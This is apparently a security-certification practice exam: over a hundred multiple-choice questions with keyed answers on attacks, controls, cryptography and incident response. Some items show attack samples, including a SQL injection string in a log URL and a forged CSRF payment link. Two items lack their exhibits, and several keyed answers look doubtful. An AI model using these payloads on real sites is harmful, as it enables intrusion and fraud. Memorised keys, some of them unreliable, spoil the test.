Question #1
A user is attempting to navigate to a website from inside the company network using a desktop. When the user types in the URL,
https://www.site.com, the user is presented with a certificate mismatch warning from the browser. The user does not receive a warning when
visiting http://www.anothersite.com. Which of the following describes this attack?
A. On-path
B. Domain hijacking
C. DNS poisoning
D. Evil twin
Correct Answer: C

Question #2
Which of the following tools is effective in preventing a user from accessing unauthorized removable media?
A. USB data blocker
B. Faraday cage
C. Proximity reader
D. Cable lock
Correct Answer: A

Question #3
A Chief Security Officer is looking for a solution that can provide increased scalability and flexibility for back-end infrastructure, allowing it to be
updated and modified without disruption to services. The security architect would like the solution selected to reduce the back-end server
resources and has highlighted that session persistence is not important for the applications running on the back-end servers. Which of the
following would BEST meet the requirements?
A. Reverse proxy
B. Automated patch management
C. Snapshots
D. NIC teaming
Correct Answer: A

Question #4
Which of the following describes a social engineering technique that seeks to exploit a person's sense of urgency?
A. A phishing email stating a cash settlement has been awarded but will expire soon
B. A smishing message stating a package is scheduled for pickup
C. A vishing call that requests a donation be made to a local charity
D. A SPIM notification claiming to be undercover law enforcement investigating a cybercrime
Correct Answer: A

Question #5
A security analyst is reviewing application logs to determine the source of a breach and locates the following log:
https://www.comptia.com/login.php?id='%20or%20'1'1='1
Which of the following has been observed?
A. DLL Injection
B. API attack
C. SQLi
D. XSS
Correct Answer: C

Question #6
An audit identified PII being utilized in the development environment of a critical application. The Chief Privacy Officer (CPO) is adamant that this
data must be removed; however, the developers are concerned that without real data they cannot perform functionality tests and search for
specific data. Which of the following should a security professional implement to BEST satisfy both the CPO's and the development team's
requirements?
A. Data anonymization
B. Data encryption
C. Data masking
D. Data tokenization
Correct Answer: C

Question #7
A company is implementing a DLP solution on the file server. The file server has PII, financial information, and health information stored on it.
Depending on what type of data that is hosted on the file server, the company wants different DLP rules assigned to the data. Which of the
following should the company do to help accomplish this goal?
A. Classify the data.
B. Mask the data.
C. Assign the application owner.
D. Perform a risk analysis.
Correct Answer: A

Question #8
A forensics investigator is examining a number of unauthorized payments that were reported on the company's website. Some unusual log entries
show users received an email for an unwanted mailing list and clicked on a link to attempt to unsubscribe. One of the users reported the email to
the phishing team, and the forwarded email revealed the link to be:
<a href="https://www.company.com/payto.do?routing=00001111&acct=22223334&amount=250">Click here to unsubscribe</a>
Which of the following will the forensics investigator MOST likely determine has occurred?
A. SQL injection
B. Broken authentication
C. XSS
D. XSRF
Correct Answer: D

Question #9
A report delivered to the Chief Information Security Officer (CISO) shows that some user credentials could be exfiltrated. The report also indicates
that users tend to choose the same credentials on different systems and applications. Which of the following policies should the CISO use to
prevent someone from using the exfiltrated credentials?
A. MFA
B. Lockout
C. Time-based logins
D. Password history
Correct Answer: D

Question #10
A company wants to simplify the certificate management process. The company has a single domain with several dozen subdomains, all of which
are publicly accessible on the internet. Which of the following BEST describes the type of certificate the company should implement?
A. Subject alternative name
B. Wildcard
C. Self-signed
D. Domain validation
Correct Answer: B

Question #11
Which of the following is an effective tool to stop or prevent the exfiltration of data from a network?
A. DLP
B. NIDS
C. TPM
D. FDE
Correct Answer: A

Question #12
Several attempts have been made to pick the door lock of a secure facility. As a result, the security engineer has been assigned to implement a
stronger preventative access control. Which of the following would BEST complete the engineer's assignment?
A. Replacing the traditional key with an RFID key
B. Installing and monitoring a camera facing the door
C. Setting motion-sensing lights to illuminate the door on activity
D. Surrounding the property with fencing and gates
Correct Answer: A

Question #13
Which of the following can be used by a monitoring tool to compare values and detect password leaks without providing the actual credentials?
A. Hashing
B. Tokenization
C. Masking
D. Encryption
Correct Answer: A

Question #14
A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific
directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be
secure. Which of the following can be used?
A. S/MIME
B. LDAPS
C. SSH
D. SRTP
Correct Answer: C

Question #15
An administrator needs to protect user passwords and has been advised to hash the passwords. Which of the following BEST describes what the
administrator is being advised to do?
A. Perform a mathematical operation on the passwords that will convert them into unique strings.
B. Add extra data to the passwords so their length is increased, making them harder to brute force.
C. Store all passwords in the system in a rainbow table that has a centralized location.
D. Enforce the use of one-time passwords that are changed for every login session.
Correct Answer: A

Question #16
Which of the following would be indicative of a hidden audio file found inside of a piece of source code?
A. Steganography
B. Homomorphic encryption
C. Cipher suite
D. Blockchain
Correct Answer: A

Question #17
A user enters a username and a password at the login screen for a web portal. A few seconds later the following message appears on the screen:
Please use a combination of numbers, special characters, and letters in the password field.
Which of the following concepts does this message describe?
A. Password complexity
B. Password reuse
C. Password history
D. Password age
Correct Answer: A

Question #18
A company recently experienced an inside attack using a corporate machine that resulted in data compromise. Analysis indicated an unauthorized
change to the software circumvented technological protection measures. The analyst was tasked with determining the best method to ensure the
integrity of the systems remains intact and local and remote boot attestation can take place. Which of the following would provide the BEST
solution?
A. HIPS
B. FIM
C. TPM
D. DLP
Correct Answer: C

Question #19
Which of the following is a reason to publish files' hashes?
A. To validate the integrity of the files
B. To verify if the software was digitally signed
C. To use the hash as a software activation key
D. To use the hash as a decryption passphrase
Correct Answer: A

Question #20
A security manager has tasked the security operations center with locating all web servers that respond to an unsecure protocol. Which of the
following commands could an analyst run to find the requested servers?
A. nslookup 10.10.10.0
B. nmap -p 80 10.10.10.0/24
C. pathping 10.10.10.0 -p 80
D. ne -l -p 80
Correct Answer: B

Question #21
Which biometric error would allow an unauthorized user to access a system?
A. False acceptance
B. False entrance
C. False rejection
D. False denial
Correct Answer: A

Question #22
A company is auditing the manner in which its European customers' personal information is handled. Which of the following should the company
consult?
A. GDPR
B. ISO
C. NIST
D. PCI DSS
Correct Answer: A

Question #23
Which of the following are common VoIP-associated vulnerabilities? (Choose two.)
A. SPIM
B. Vishing
C. Hopping
D. Phishing
E. Credential harvesting
F. Tailgating
Correct Answer: BE

Question #24
Which of the following describes the exploitation of an interactive process to gain access to restricted areas?
A. Persistence
B. Buffer overflow
C. Privilege escalation
D. Pharming
Correct Answer: C

Question #25
An organization is planning to open other data centers to sustain operations in the event of a natural disaster. Which of the following
considerations would BEST support the organization's resiliency?
A. Geographic dispersal
B. Generator power
C. Fire suppression
D. Facility automation
Correct Answer: A

Question #26
A security engineer is deploying a new wireless network for a company. The company shares office space with multiple tenants. Which of the
following should the engineer configure on the wireless network to ensure that confidential data is not exposed to unauthorized users?
A. EAP
B. TLS
C. HTTPS
D. AES
Correct Answer: A

Question #27
The Chief Compliance Officer from a bank has approved a background check policy for all new hires. Which of the following is the policy MOST
likely protecting against?
A. Preventing any current employees' siblings from working at the bank to prevent nepotism
B. Hiring an employee who has been convicted of theft to adhere to industry compliance
C. Filtering applicants who have added false information to resumes so they appear better qualified
D. Ensuring no new hires have worked at other banks that may be trying to steal customer information
Correct Answer: B

Question #28
An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security policy, all web-server ports except 443 should
be disabled.
Which of the following can be used to accomplish this task?
A. Application allow list
B. SWG
C. Host-based firewall
D. VPN
Correct Answer: C

Question #29
A technician was dispatched to complete repairs on a server in a data center. While locating the server, the technician entered a restricted area
without authorization. Which of the following security controls would BEST prevent this in the future?
A. Use appropriate signage to mark all areas.
B. Utilize cameras monitored by guards.
C. Implement access control vestibules.
D. Enforce escorts to monitor all visitors.
Correct Answer: C

Question #30
Which of the following would BEST provide a systems administrator with the ability to more efficiently identify systems and manage permissions
and policies based on location, role, and service level?
A. Standard naming conventions
B. Domain services
C. Baseline configurations
D. Diagrams
Correct Answer: A

Question #31
Which of the following would detect intrusions at the perimeter of an airport?
A. Signage
B. Fencing
C. Motion sensors
D. Lighting
E. Bollards
Correct Answer: C

Question #32
A security analyst is concerned about critical vulnerabilities that have been detected on some applications running inside containers. Which of the
following is the
BEST remediation strategy?
A. Update the base container Image and redeploy the environment.
B. Include the containers in the regular patching schedule for servers.
C. Patch each running container individually and test the application.
D. Update the host in which the containers are running.
Correct Answer: A

Question #33
An organization has decided to purchase an insurance policy because a risk assessment determined that the cost to remediate the risk is greater
than the five- year cost of the insurance policy. The organization is enabling risk:
A. avoidance.
B. acceptance.
C. mitigation.
D. transference.
Correct Answer: D

Question #34
A security analyst receives an alert from the company's SIEM that anomalous activity is coming from a local source IP address of 192.168.34.26.
The Chief
Information Security Officer asks the analyst to block the originating source. Several days later, another employee opens an internal ticket stating
that vulnerability scans are no longer being performed properly. The IP address the employee provides is 192.168.34.26. Which of the following
describes this type of alert?
A. True negative
B. True positive
C. False positive
D. False negative
Correct Answer: C

Question #35
A security analyst wants to reference a standard to develop a risk management program. Which of the following is the BEST source for the analyst
to use?
A. SSAE SOC 2
B. ISO 31000
C. NIST CSF
D. GDPR
Correct Answer: B

Question #36
The Chief Information Security Officer (CISO) requested a report on potential areas of improvement following a security incident. Which of the
following incident response processes is the CISO requesting?
A. Lessons learned
B. Preparation
C. Detection
D. Containment
E. Root cause analysis
Correct Answer: A

Question #37
A company is providing security awareness training regarding the importance of not forwarding social media messages from unverified sources.
Which of the following risks would this training help to prevent?
A. Hoaxes
B. SPIMs
C. Identity fraud
D. Credential harvesting
Correct Answer: A

Question #38
A security analyst is receiving numerous alerts reporting that the response time of an internet-facing application has been degraded. However, the
internal network performance was not degraded. Which of the following MOST likely explains this behavior?
A. DNS poisoning
B. MAC flooding
C. DDoS attack
D. ARP poisoning
Correct Answer: C

Question #39
Which of the following will increase cryptographic security?
A. High data entropy
B. Algorithms that require less computing power
C. Longer key longevity
D. Hashing
Correct Answer: A

Question #40
Which of the following statements BEST describes zero-day exploits?
A. When a zero-day exploit is discovered, the system cannot be protected by any means.
B. Zero-day exploits have their own scoring category in CVSS.
C. A zero-day exploit is initially undetectable, and no patch for it exists.
D. Discovering zero-day exploits is always performed via bug bounty programs.
Correct Answer: C

Question #41
A company wants to restrict emailing of PHI documents. The company is implementing a DLP solution. In order to restrict PHI documents, which
of the following should be performed FIRST?
A. Retention
B. Governance
C. Classification
D. Change management
Correct Answer: C

Question #42
A security analyst is investigating some users who are being redirected to a fake website that resembles www.comptia.org. The following output
was found on the naming server of the organization:
Which of the following attacks has taken place?
A. Domain reputation
B. Domain hijacking
C. Disassociation
D. DNS poisoning
Correct Answer: D

Question #43
Which of the following describes the continuous delivery software development methodology?
A. Waterfall
B. Spiral
C. V-shaped
D. Agile
Correct Answer: D

Question #44
Which of the following is the BEST example of a cost-effective physical control to enforce a USB removable media restriction policy?
A. Putting security/antitamper tape over USB ports, logging the port numbers, and regularly inspecting the ports
B. Implementing a GPO that will restrict access to authorized USB removable media and regularly verifying that it is enforced
C. Placing systems into locked, key-controlled containers with no access to the USB ports
D. Installing an endpoint agent to detect connectivity of USB and removable media
Correct Answer: A

Question #45
A company suspects that some corporate accounts were compromised. The number of suspicious logins from locations not recognized by the
users is increasing.
Employees who travel need their accounts protected without the risk of blocking legitimate login requests that may be made over new sign-in
properties. Which of the following security controls can be implemented?
A. Enforce MFA when an account request reaches a risk threshold.
B. Implement geofencing to only allow access from headquarters.
C. Enforce time-based login requests that align with business hours.
D. Shift the access control scheme to a discretionary access control.
Correct Answer: A

Question #46
An organization wants to participate in threat intelligence information sharing with peer groups. Which of the following would MOST likely meet
the organization's requirement?
A. Perform OSINT investigations.
B. Subscribe to threat intelligence feeds.
C. Submit RFCs.
D. Implement a TAXII server.
Correct Answer: D

Question #47
Which of the following is the MOST effective control against zero-day vulnerabilities?
A. Network segmentation
B. Patch management
C. Intrusion prevention system
D. Multiple vulnerability scanners
Correct Answer: A

Question #48
Which of the following is the GREATEST security concern when outsourcing code development to third-party contractors for an internet-facing
application?
A. Intellectual property theft
B. Elevated privileges
C. Unknown backdoor
D. Quality assurance
Correct Answer: C

Question #49
An organization has hired a red team to simulate attacks on its security posture. Which of the following will the blue team do after detecting an
IoC?
A. Reimage the impacted workstations.
B. Activate runbooks for incident response.
C. Conduct forensics on the compromised system.
D. Conduct passive reconnaissance to gather information.
Correct Answer: B

Question #50
An amusement park is implementing a biometric system that validates customers' fingerprints to ensure they are not sharing tickets. The park's
owner values customers above all and would prefer customers' convenience over security. For this reason, which of the following features should
the security team prioritize
FIRST?
A. Low FAR
B. Low efficacy
C. Low FRR
D. Low CER
Correct Answer: C

Question #51
Which of the following organizations sets frameworks and controls for optimal security configuration on systems?
A. ISO
B. GDPR
C. PCI DSS
D. NIST
Correct Answer: D

Question #52
An organization discovered files with proprietary financial data have been deleted. The files have been recovered from backup, but every time the
Chief Financial
Officer logs in to the file server, the same files are deleted again. No other users are experiencing this issue. Which of the following types of
malware is MOST likely causing this behavior?
A. Logic bomb
B. Cryptomalware
C. Spyware
D. Remote access Trojan
Correct Answer: A

Question #53
A security analyst has identified malware spreading through the corporate network and has activated the CSIRT. Which of the following should the
analyst do
NEXT?
A. Review how the malware was introduced to the network.
B. Attempt to quarantine all infected hosts to limit further spread.
C. Create help desk tickets to get infected systems reimaged.
D. Update all endpoint antivirus solutions with the latest updates.
Correct Answer: B

Question #54
During an incident response, an analyst applied rules to all inbound traffic on the border firewall and implemented ACLs on each critical server.
Following an investigation, the company realizes it is still vulnerable because outbound traffic is not restricted, and the adversary is able to
maintain a presence in the network.
In which of the following stages of the Cyber Kill Chain is the adversary currently operating?
A. Reconnaissance
B. Command and control
C. Actions on objective
D. Exploitation
Correct Answer: B

Question #55
A recent security breach exploited software vulnerabilities in the firewall and within the network management solution. Which of the following will
MOST likely be used to identify when the breach occurred through each device?
A. SIEM correlation dashboards
B. Firewall syslog event logs
C. Network management solution login audit logs
D. Bandwidth monitors and interface sensors
Correct Answer: A

Question #56
Which of the following is the FIRST environment in which proper, secure coding should be practiced?
A. Stage
B. Development
C. Production
D. Test
Correct Answer: B

Question #57
A cloud service provider has created an environment where customers can connect existing local networks to the cloud for additional computing
resources and block internal HR applications from reaching the cloud. Which of the following cloud models is being used?
A. Public
B. Community
C. Hybrid
D. Private
Correct Answer: C

Question #58
An organization has developed an application that needs a patch to fix a critical vulnerability. In which of the following environments should the
patch be deployed
LAST?
A. Test
B. Staging
C. Development
D. Production
Correct Answer: D

Question #59
An organization is building backup server rooms in geographically diverse locations. The Chief Information Security Officer implemented a
requirement on the project that states the new hardware cannot be susceptible to the same vulnerabilities in the existing server room. Which of
the following should the systems engineer consider?
A. Purchasing hardware from different vendors
B. Migrating workloads to public cloud infrastructure
C. Implementing a robust patch management solution
D. Designing new detective security controls
Correct Answer: A

Question #60
A security analyst is working on a project to implement a solution that monitors network communications and provides alerts when abnormal
behavior is detected.
Which of the following is the security analyst MOST likely implementing?
A. Vulnerability scans
B. User behavior analysis
C. Security orchestration, automation, and response
D. Threat hunting
Correct Answer: B

Question #61
Data exfiltration analysis indicates that an attacker managed to download system configuration notes from a web server. The web-server logs
have been deleted, but analysts have determined that the system configuration notes were stored in the database administrator's folder on the
web server. Which of the following attacks explains what occurred? (Choose two.)
A. Pass-the-hash
B. Directory traversal
C. SQL injection
D. Privilege escalation
E. Cross-site scripting
F. Request forgery
Correct Answer: BD

Question #62
A junior security analyst is conducting an analysis after passwords were changed on multiple accounts without users' interaction. The SIEM have
multiple login entries with the following text: suspicious event - user: scheduledtasks successfully authenticate on AD on abnormal time
suspicious event - user: scheduledtasks failed to execute c:\weekly_checkups\amazing-3rdparty-domain-assessment.py suspicious event - user:
scheduledtasks failed to execute c:\weekly_checkups\secureyourAD-3rdparty-compliance.sh suspicious event - user: scheduledtasks
successfully executed c:\weekly_checkups\amazing-3rdparty-domain-assessment.py
Which of the following is the MOST likely attack conducted on the environment?
A. Malicious script
B. Privilege escalation
C. Domain hijacking
D. DNS poisoning
Correct Answer: A

Question #63
A customer service representative reported an unusual text message that was sent to the help desk. The message contained an unrecognized
invoice number with a large balance due and a link to click for more details. Which of the following BEST describes this technique?
A. Vishing
B. Whaling
C. Phishing
D. Smishing
Correct Answer: D

Question #64
Which of the following actions would be recommended to improve an incident response process?
A. Train the team to identify the difference between events and incidents.
B. Modify access so the IT team has full access to the compromised assets.
C. Contact the authorities if a cybercrime is suspected.
D. Restrict communication surrounding the response to the IT team.
Correct Answer: A

Question #65
A cybersecurity administrator needs to implement a Layer 7 security control on a network and block potential attacks. Which of the following can
block an attack at
Layer 7? (Choose two.)
A. HIDS
B. NIPS
C. HSM
D. WAF
E. NAC
F. NIDS
Correct Answer: BD

Question #66
A business operations manager is concerned that a PC that is critical to business operations will have a costly hardware failure soon. The
manager is looking for options to continue business operations without incurring large costs. Which of the following would mitigate the manager's
concerns?
A. Implement a full system upgrade.
B. Perform a physical-to-virtual migration.
C. Install uninterruptible power supplies.
D. Purchase cybersecurity insurance.
Correct Answer: B

Question #67
An organization has activated an incident response plan due to a malware outbreak on its network. The organization has brought in a forensics
team that has identified an internet-facing Windows server as the likely point of initial compromise. The malware family that was detected is
known to be distributed by manually logging on to servers and running the malicious code. Which of the following actions would be BEST to
prevent reinfection from the infection vector?
A. Prevent connections over TFTP from the internal network.
B. Create a firewall rule that blocks a 22 from the internet to the server.
C. Disable file sharing over port 445 to the server.
D. Block port 3389 inbound from untrusted networks.
Correct Answer: D

Question #68
Which of the following uses SAML for authentication?
A. TOTP
B. Federation
C. Kerberos
D. HOTP
Correct Answer: B

Question #69
The SOC for a large MSSP is meeting to discuss the lessons learned from a recent incident that took much too long to resolve. This type of
incident has become more common in recent weeks and is consuming large amounts of the analysts' time due to manual tasks being performed.
Which of the following solutions should the SOC consider to BEST improve its response time?
A. Configure a NIDS appliance using a Switched Port Analyzer.
B. Collect OSINT and catalog the artifacts in a central repository.
C. Implement a SOAR with customizable playbooks.
D. Install a SIEM with community-driven threat intelligence.
Correct Answer: C

Question #70
Business partners are working on a security mechanism to validate transactions securely. The requirement is for one company to be responsible
for deploying a trusted solution that will register and issue artifacts used to sign, encrypt, and decrypt transaction files. Which of the following is
the BEST solution to adopt?
A. PKI
B. Blockchain
C. SAML
D. OAuth
Correct Answer: A

Question #71
A security analyst has been asked by the Chief Information Security Officer to:
✑ develop a secure method of providing centralized management of infrastructure
✑ reduce the need to constantly replace aging end user machines
✑ provide a consistent user desktop experience
Which of the following BEST meets these requirements?
A. BYOD
B. Mobile device management
C. VDI
D. Containerization
Correct Answer: C

Question #72
Which of the following terms describes a broad range of information that is sensitive to a specific organization?
A. Public
B. Top secret
C. Proprietary
D. Open-source
Correct Answer: C

Question #73
A Chief Security Officer (CSO) is concerned that cloud-based services are not adequately protected from advanced threats and malware. The CSO
believes there is a high risk that a data breach could occur in the near future due to the lack of detective and preventive controls. Which of the
following should be implemented to BEST address the CSO's concerns? (Choose two.)
A. A WAF
B. A CASB
C. An NG-SWG
D. Segmentation
E. Encryption
F. Containerization
Correct Answer: BC

Question #74
An organization is planning to roll out a new mobile device policy and issue each employee a new laptop. These laptops would access the users'
corporate operating system remotely and allow them to use the laptops for purposes outside of their job roles. Which of the following deployment
models is being utilized?
A. MDM and application management
B. BYOD and containers
C. COPE and VDI
D. CYOD and VMs
Correct Answer: C

Question #75
Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further
investigation, a security analyst notices the following:
✑ All users share workstations throughout the day.
✑ Endpoint protection was disabled on several workstations throughout the network.
✑ Travel times on logins from the affected users are impossible.
✑ Sensitive data is being uploaded to external sites.
All user account passwords were forced to be reset and the issue continued.
Which of the following attacks is being used to compromise the user accounts?
A. Brute-force
B. Keylogger
C. Dictionary
D. Rainbow
Correct Answer: B

Question #76
A security forensics analyst is examining a virtual server. The analyst wants to preserve the present state of the virtual server, including memory
contents. Which of the following backup types should be used?
A. Snapshot
B. Differential
C. Cloud
D. Full
E. Incremental
Correct Answer: A

Question #77
After returning from a conference, a user's laptop has been operating slower than normal and overheating, and the fans have been running
constantly. During the diagnosis process, an unknown piece of hardware is found connected to the laptop's motherboard. Which of the following
attack vectors was exploited to install the hardware?
A. Removable media
B. Spear phishing
C. Supply chain
D. Direct access
Correct Answer: D

Question #78
After a recent security breach, a security analyst reports that several administrative usernames and passwords are being sent via cleartext across
the network to access network devices over port 23. Which of the following should be implemented so all credentials sent over the network are
encrypted when remotely accessing and configuring network devices?
A. SSH
B. SNMPv3
C. SFTP
D. Telnet
E. FTP
Correct Answer: A

Question #79
Which of the following provides a calculated value for known vulnerabilities so organizations can prioritize mitigation steps?
A. CVSS
B. SIEM
C. SOAR
D. CVE
Correct Answer: A

Question #80
Several universities are participating in a collaborative research project and need to share compute and storage resources. Which of the following
cloud deployment strategies would BEST meet this need?
A. Community
B. Private
C. Public
D. Hybrid
Correct Answer: A

Question #81
A forensic analyst needs to prove that data has not been tampered with since it was collected. Which of the following methods will the analyst
MOST likely use?
A. Look for tampering on the evidence collection bag.
B. Encrypt the collected data using asymmetric encryption.
C. Ensure proper procedures for chain of custody are being followed.
D. Calculate the checksum using a hashing algorithm.
Correct Answer: D

Question #82
Multiple business accounts were compromised a few days after a public website had its credentials database leaked on the Internet. No business
emails were identified in the breach, but the security team thinks that the list of passwords exposed was later used to compromise business
accounts. Which of the following would mitigate the issue?
A. Complexity requirements
B. Password history
C. Acceptable use policy
D. Shared accounts
Correct Answer: B

Question #83
A security analyst wants to fingerprint a web server. Which of the following tools will the security analyst MOST likely use to accomplish this task?
A. nmap -pl-65535 192.168.0.10
B. dig 192.168.0.10
C. curl --head http://192.168.0.10
D. ping 192.168.0.10
Correct Answer: C

Question #84
A penetration tester was able to compromise an internal server and is now trying to pivot the current session in a network lateral movement.
Which of the following tools, if available on the server, will provide the MOST useful information for the next assessment step?
A. Autopsy
B. Cuckoo
C. Memdump
D. Nmap
Correct Answer: D

Question #85
Field workers in an organization are issued mobile phones on a daily basis. All the work is performed within one city, and the mobile phones are
not used for any purpose other than work. The organization does not want these phones used for personal purposes. The organization would like
to issue the phones to workers as permanent devices so the phones do not need to be reissued every day. Given the conditions described, which
of the following technologies would BEST meet these requirements?
A. Geofencing
B. Mobile device management
C. Containerization
D. Remote wiping
Correct Answer: B

Question #86
Which of the following control types is focused primarily on reducing risk before an incident occurs?
A. Preventive
B. Deterrent
C. Corrective
D. Detective
Correct Answer: A

Question #87
A systems administrator reports degraded performance on a virtual server. The administrator increases the virtual memory allocation, which
improves conditions, but performance degrades again after a few days. The administrator runs an analysis tool and sees the following output:
==3214== timeAttend.exe analyzed
==3214== ERROR SUMMARY:
==3214== malloc/free: in use at exit: 4608 bytes in 18 blocks.
==3214== checked 82116 bytes
==3214== definitely lost: 4608 bytes in 18 blocks.
The administrator terminates the timeAttend.exe, observes system performance over the next few days, and notices that the system performance
does not degrade. Which of the following issues is MOST likely occurring?
A. DLL injection
B. API attack
C. Buffer overflow
D. Memory leak
Correct Answer: D

Question #88
An administrator is experiencing issues when trying to upload a support file to a vendor. A pop-up message reveals that a payment card number
was found in the file, and the file upload was blocked. Which of the following controls is most likely causing this issue and should be checked
FIRST?
A. DLP
B. Firewall rule
C. Content filter
D. MDM
E. Application allow list
Correct Answer: A

Question #89
Which of the following risk management strategies would an organization use to maintain a legacy system with known risks for operational
purposes?
A. Acceptance
B. Transference
C. Avoidance
D. Mitigation
Correct Answer: A

Question #90
Which of the following is the BEST action to foster a consistent and auditable incident response process?
A. Incent new hires to constantly update the document with external knowledge.
B. Publish the document in a central repository that is easily accessible to the organization.
C. Restrict eligibility to comment on the process to subject matter experts of each IT silo.
D. Rotate CIRT members to foster a shared responsibility model in the organization.
Correct Answer: B

Question #91
During a recent penetration test, the tester discovers large amounts of data were exfiltrated over the course of 12 months via the internet. The
penetration tester stops the test to inform the client of the findings. Which of the following should be the client's NEXT step to mitigate the issue?
A. Conduct a full vulnerability scan to identify possible vulnerabilities.
B. Perform containment on the critical servers and resources.
C. Review the firewall and identify the source of the active connection.
D. Disconnect the entire infrastructure from the internet.
Correct Answer: B

Question #92
A security analyst is designing the appropriate controls to limit unauthorized access to a physical site. The analyst has a directive to utilize the
lowest possible budget. Which of the following would BEST meet the requirements?
A. Preventive controls
B. Compensating controls
C. Deterrent controls
D. Detective controls
Correct Answer: C

Question #93
A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has 100 databases that are on
premises. Which of the following solutions will require the LEAST management and support from the company?
A. SaaS
B. IaaS
C. PaaS
D. SDN
Correct Answer: A

Question #94
Which of the following employee roles is responsible for protecting an organization's collected personal information?
A. CTO
B. DPO
C. CEO
D. DBA
Correct Answer: B

Question #95
Against the recommendation of the IT security analyst, a company set all user passwords on a server as `P@55w0rD`. Upon review of the
/etc/passwd file, an attacker found the following: alice:a8df3b6c4fd75f0617431fd248f35191df8d237f
bob:2d250c5b2976b03d757f324ebd59340df96aa05e chris:ea981ec3285421d014108089f3f3f997ce0f4150
Which of the following BEST explains why the encrypted passwords do not match?
A. Perfect forward secrecy
B. Key stretching
C. Salting
D. Hashing
Correct Answer: C

Question #96
After gaining access to a dual-homed (i.e., wired and wireless) multifunction device by exploiting a vulnerability in the device's firmware, a
penetration tester then gains shell access on another networked asset. This technique is an example of:
A. privilege escalation.
B. footprinting.
C. persistence.
D. pivoting.
Correct Answer: D

Question #97
Which of the following should be monitored by threat intelligence researchers who search for leaked credentials?
A. Common Weakness Enumeration
B. OSINT
C. Dark web
D. Vulnerability databases
Correct Answer: C

Question #98
A security analyst needs to be able to search and correlate logs from multiple sources in a single tool. Which of the following would BEST allow a
security analyst to have this ability?
A. SOAR
B. SIEM
C. Log collectors
D. Network-attached storage
Correct Answer: B

Question #99
A security analyst is investigating suspicious traffic on the web server located at IP address 10.10.1.1. A search of the WAF logs reveals the
following output:
Which of the following is MOST likely occurring?
A. XSS attack
B. SQLi attack
C. Replay attack
D. XSRF attack
Correct Answer: B

Question #100
Which of the following components can be used to consolidate and forward inbound internet traffic to multiple cloud environments though a
single firewall?
A. Transit gateway
B. Cloud hot site
C. Edge computing
D. DNS sinkhole
Correct Answer: A

Question #101
A DBA reports that several production server hard drives were wiped over the weekend. The DBA also reports that several Linux servers were
unavailable due to system files being deleted unexpectedly. A security analyst verified that software was configured to delete data deliberately
from those servers. No backdoors to any servers were found. Which of the following attacks was MOST likely used to cause the data loss?
A. Logic bomb
B. Ransomware
C. Fileless virus
D. Remote access Trojans
E. Rootkit
Correct Answer: A

Question #102
Digital signatures use asymmetric encryption. This means the message is encrypted with:
A. the sender's private key and decrypted with the sender's public key.
B. the sender's public key and decrypted with the sender's private key.
C. the sender's private key and decrypted with the recipient's public key.
D. the sender's public key and decrypted with the recipient's private key.
Correct Answer: A

Question #103
A security engineer was assigned to implement a solution to prevent attackers from gaining access by pretending to be authorized users. Which
of the following technologies meets the requirement?
A. SSO
B. IDS
C. MFA
D. TPM
Correct Answer: C

Question #104
The Chief Information Security Officer (CISO) has requested that a third-party vendor provide supporting documents that show proper controls are
in place to protect customer data. Which of the following would be BEST for the third-party vendor to provide to the CISO?
A. GDPR compliance attestation
B. Cloud Security Alliance materials
C. SOC 2 Type 2 report
D. NIST RMF workbooks
Correct Answer: C

Question #105
Which of the following is assured when a user signs an email using a private key?
A. Non-repudiation
B. Confidentiality
C. Availability
D. Authentication
Correct Answer: A

Question #106
A systems administrator is troubleshooting a server's connection to an internal web server. The administrator needs to determine the correct ports
to use. Which of the following tools BEST shows which ports on the web server are in a listening state?
A. ipconfig
B. ssh
C. ping
D. netstat
Correct Answer: D

Question #107
Which of the following BEST reduces the security risks introduced when running systems that have expired vendor support and lack an immediate
replacement?
A. Implement proper network access restrictions.
B. Initiate a bug bounty program.
C. Classify the system as shadow IT.
D. Increase the frequency of vulnerability scans.
Correct Answer: A

Question #108
Due to unexpected circumstances, an IT company must vacate its main office, forcing all operations to alternate, off-site locations. Which of the
following will the company MOST likely reference for guidance during this change?
A. The business continuity plan
B. The retention policy
C. The disaster recovery plan
D. The incident response plan
Correct Answer: A

Question #109
While reviewing an alert that shows a malicious request on one web application, a cybersecurity analyst is alerted to a subsequent token reuse
moments later on a different service using the same single sign-on method. Which of the following would BEST detect a malicious actor?
A. Utilizing SIEM correlation engines
B. Deploying Netflow at the network border
C. Disabling session tokens for all sites
D. Deploying a WAF for the web server
Correct Answer: A

Question #110
Two organizations plan to collaborate on the evaluation of new SIEM solutions for their respective companies. A combined effort from both
organizations' SOC teams would speed up the effort. Which of the following can be written to document this agreement?
A. MOU
B. ISA
C. SLA
D. NDA
Correct Answer: A

Question #111
The Chief Information Security Officer wants to prevent exfiltration of sensitive information from employee cell phones when using public USB
power charging stations. Which of the following would be the BEST solution to implement?
A. DLP
B. USB data blocker
C. USB OTG
D. Disabling USB ports
Correct Answer: B

Question #112
The board of directors at a company contracted with an insurance firm to limit the organization's liability. Which of the following risk management
practices does this BEST describe?
A. Transference
B. Avoidance
C. Mitigation
D. Acknowledgement
Correct Answer: A

Question #113
Which of the following is a risk that is specifically associated with hosting applications in the public cloud?
A. Unsecured root accounts
B. Zero-day
C. Shared tenancy
D. Insider threat
Correct Answer: C

Question #114
DDoS attacks are causing an overload on the cluster of cloud servers. A security architect is researching alternatives to make the cloud
environment respond to load fluctuation in a cost-effective way. Which of the following options BEST fulfills the architect's requirements?
A. An orchestration solution that can adjust scalability of cloud assets
B. Use of multipath by adding more connections to cloud storage
C. Cloud assets replicated on geographically distributed regions
D. An on-site backup that is displayed and only used when the load increases
Correct Answer: A

Question #115
Which of the following documents provides expectations at a technical level for quality, availability, and responsibilities?
A. EOL
B. SLA
C. MOU
D. EOSL
Correct Answer: B

Question #116
Which of the following is an example of transference of risk?
A. Purchasing insurance
B. Patching vulnerable servers
C. Retiring outdated applications
D. Application owner risk sign-off
Correct Answer: A

Question #117
An employee received a word processing file that was delivered as an email attachment. The subject line and email content enticed the employee
to open the attachment. Which of the following attack vectors BEST matches this malware?
A. Embedded Python code
B. Macro-enabled file
C. Bash scripting
D. Credential-harvesting website
Correct Answer: B

Question #118
A security proposal was set up to track requests for remote access by creating a baseline of the users' common sign-in properties. When a
baseline deviation is detected, an MFA challenge will be triggered. Which of the following should be configured in order to deploy the proposal?
A. Context-aware authentication
